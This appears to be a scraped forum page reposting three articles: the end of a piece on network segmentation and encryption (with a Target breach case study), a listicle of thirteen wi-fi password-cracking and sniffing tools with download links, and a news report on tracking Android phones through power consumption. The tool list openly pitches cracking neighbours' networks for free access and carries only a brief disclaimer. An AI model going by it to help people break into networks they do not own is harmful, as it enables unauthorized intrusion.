several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving the NFV’s security, Andreas Lemke advises users to utilize the following two-pronged combination: “Reducing generic virtualization threats as much as possible by securing the virtualization platform Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection” Drafting a stringent security policy on what is to be transferred from zone to zone is the next step. Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and areas where there is no other information beyond what is required. A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic. Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party. Define “good faith”, innocuous communication paths and block suspicious data traffic. Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones. Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment. There are standards that can provide guidance on how to set up efficient separation of data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is such, and in this case sensitive information like payment card data should be isolated from the rest of the network. Case Study: Target Data Breach As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to secure in a proper fashion the access of third parties to their payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is a noncompliance in itself with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company’s Point-of-sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place. Enhanced Security with Proper Encryption The classical security architecture counts on establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question. As if the old maxima “Hope for the best and prepare for (assume) the worst” is better justified in terms of real-deal proactive security measures like encryption, especially for preservation of sensitive data. A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of the IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existent fragmented environment. Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to do. The following statistic reflects on the aforementioned subject: “45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on.” Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is it abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption. II. Mobile Data Traffic and Network Security The mobile unencrypted traffic from apps is growing each month. At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent of a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords. Diagram 3 Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati). Bring Your Own Device (BYOD) Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data trusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (that could be an IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environment is vital for complying with the current standards in terms of efficiency and security. The silo style of mobility Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company. The silo-based nature of all mobile devices, however, localize the perimeter protection to the company’s boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor can obtain and leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not possess antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered “safe” and “trusted” (See Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and secure or isolate internal applications containing sensitive servers. Diagram 4 Conclusion The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Allocating funds to network security projects for this years is envisaged by approximately two-thirds of all enterprises participating in the interview. We can only hope that these measures will not come as “too little, too late”. And while the investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our personal perception to these changes. Reference List Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/ Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10 Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/ Cryptozone. Network Segmentation. Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687 McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf Olzak, T. (2012). VLAN Network Segmentation and Security- Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/ Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/ Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation SDNCentral. SDN Security Challenges in SDN Environments. Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/ TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html Diagram 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634 Source
  24. Internet is now the basic need of our daily life. With the increasing use of smartphones, most of the things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use it for free. But most these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks. Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing. In this article, I am going to discuss wireless security and best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks. Wireless Networks and Hacking Wireless networks are based on IEEE 802.11 standards defined by IEEE(Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way. Basically there are two types of vulnerabilities which can be found in the Wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include the weak password, no security settings, use of default configurations, and other user related things. Poor encryption is related to security keys used to protect the wireless network. It is there because of issues in WEP or WPA. WEP and WPA WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weakness were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security. Basically wireless hacking tools are of two types. One of which can be used to sniff the network and monitor what is happening in the network. And other kinds of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting. 1. Aircrack Aircrack is one of the most popular wireless passwords cracking tools which you can use for 802.11a/b/g WEP and WPA cracking. Aircrack uses the best algorithms to recover wireless passwords by capturing packets. Once enough packets have been gathered, it tries to recover the password. To make the attack faster, it implements a standard FMS attack with some optimizations. The company behind the tool also offers an online tutorial where you can learn how to install and use this tool to crack wireless passwords. It comes as Linux distribution, Live CD and VMware image options. You can use any of these. It supports most of the wireless adapters and is almost guaranteed to work. If you are using a Linux distribution, the only drawback of the tool is that it requires deeper knowledge of Linux. If you are not comfortable with Linux, you will find it hard to use this tool. In this case, try Live CD or VMWare image. VMWare Image needs less knowledge, but it only works with a limited set of host OS, and only USB devices are supported. Before you start using this too, confirm that the wireless card can inject packets. Then start WEP cracking. Read the online tutorial on the website to know more about the tool. If you will follow steps properly, you will end up getting success with this tool. Download: http://www.aircrack-ng.org/ 2. AirSnort AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords. Download: http://sourceforge.net/projects/airsnort/ 3. Cain & Able Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool. Download: http://www.oxid.it/cain.html 4. Kismet Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms. Download: http://www.kismetwireless.net/ 5. NetStumbler NetStumbler is a popular Windows tool to find open wireless access points. This tool is free and is available for Windows. A trimmed down version of the tool is also available. It is called MiniStumbler. Basically NetStumblet is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more. But the tool also has a big disadvantage. It can be easily detected by most of the wireless intrusion detection systems available. This is because it actively probes a network to collect useful information. Another disadvantage of the tool is that it does not work properly with the latest 64 bit Windows OS. This is because the tool was last updated back in April 2004. It has been around 11 years since the last stable release of the tool. Download Netstumbler: http://www.stumbler.net/ 6. inSSIDer inSSIDer is a popular Wi-Fi scanner for Microsoft Windows and OS X operating systems. Initially the tool was opensource. Later it became premium and now costs $19.99. It was also awarded as “Best Opensource Software in Networking”. The inSSIDer wi-fi scanner can do various tasks, including finding open wi-fi access points, tracking signal strength, and saving logs with GPS records. Download inSSIDer: http://www.inssider.com/ 7. WireShark WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaries, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge. Download Wireshark: https://www.wireshark.org/ 8. CoWPAtty CoWPAtty is an automated dictionary attack tool for WPA-PSK. It runs on Linux OS. This program has a command line interface and runs on a word-list that contains the password to use in the attack. Using the tool is really simple, but it is slow. That’s because the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hack for each word contained in the dictionary by using the SSID. The new version of the tool tried to improve the speed by using a pre-computed hash file. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIs. But if your SSID is not in those 1000, you are unlucky. Download CoWPAtty: http://sourceforge.net/projects/cowpatty/ 9. Airjack Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network. Download AirJack: http://sourceforge.net/projects/airjack/ 10. WepAttack WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack. Download WebAttack: http://wepattack.sourceforge.net/ 11. OmniPeek OmniPeek is another nice packet sniffer and network analyzer tool. This tool is commercial and supports only Windows operating systems. This tool is used to capture and analyze wireless traffic. But it requires you to have good knowledge of protocols to properly understand things. A good thing is that the tool works with most of the network interface cards available in market. This tool is used for network troubleshooting. This tool also supports plugins, and 40 plugins are already available to extend the features of the tool. Download: http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer 12. CommView for WiFi CommView for WiFi is another popular wireless monitor and packet analyzer tool. It comes with an easy to understand GUI. It works fine with 802.11 a/b/g/n/ac networks. It captures every packet and displays useful information as a list. You can get useful information like access points, stations, signal strength, network connections and protocol distribution. Captured packets can be decrypted by user-defined WEP or WPA keys. This tool is basically for wi-fi network admins, security professionals, and home users who want to monitor their wi-fi traffic and programmers working on software for wireless networks. Download CommView: http://www.tamos.com/products/commwifi/ 13. CloudCracker CloudCracker is the online password cracking tool for cracking WPA protected wi-fi networks. This tool can also be used to crack different password hashes. Just upload the handshake file, enter the network name and start the tool. This tool has a huge dictionary of around 300 million words to perform attacks. Try Cloudcracker: https://www.cloudcracker.com/ Conclusion In this post, I discussed 13 wireless hacking tools. A few wireless hacking tools are for cracking the password to get unauthorized access, and a few are for monitoring and troubleshooting the network. But most of the people really interested in tools to crack wireless hotspots just want to get free Internet access. The above collection also contains those tools which try a dictionary attack to crack wi-fi passwords to allow you to get free Internet access. But be sure not to use these tools in a risky place. Hacking wireless networks to get unauthorized access may be a crime in your country. You may get into trouble for using these tools. So, please do not use these tools for illegal works. As I already mentioned, you should never use the WEP encryption key in your home or wireless network. With available tools, it is child’s play to crack the WEP keys and access your wi-fi network. Wireless monitoring and troubleshooting tools are basically for network admins and programmers working on wi-fi based software. These tools really help when some of your systems face problems in connecting to the network. I hope you enjoyed this article and got relevant information about popular wireless hacking and password cracking tools. I tried my best to compile this list of password hacking tools, but as a human error, I may miss something. If I forgot any important tool in this, please let me know in the comments. Source
  25. Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found. A smartphone uses more power the further away it is from a cellular base and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption. "The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data. "These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim." There are 179 apps currently available on Android app store Google Play that request this information, the team add. Activity such as listening to music, activating maps, taking voice calls or using social media all drain the battery but this can be discounted due to "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise." The tests were carried out on phones using the 3G network but did not measure signal strength as that data is protected by the device. 'Stuffed with sensors' "With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. "I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras. "This latest work shows that even that basic characteristics (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that." Source
×
×
  • Create New...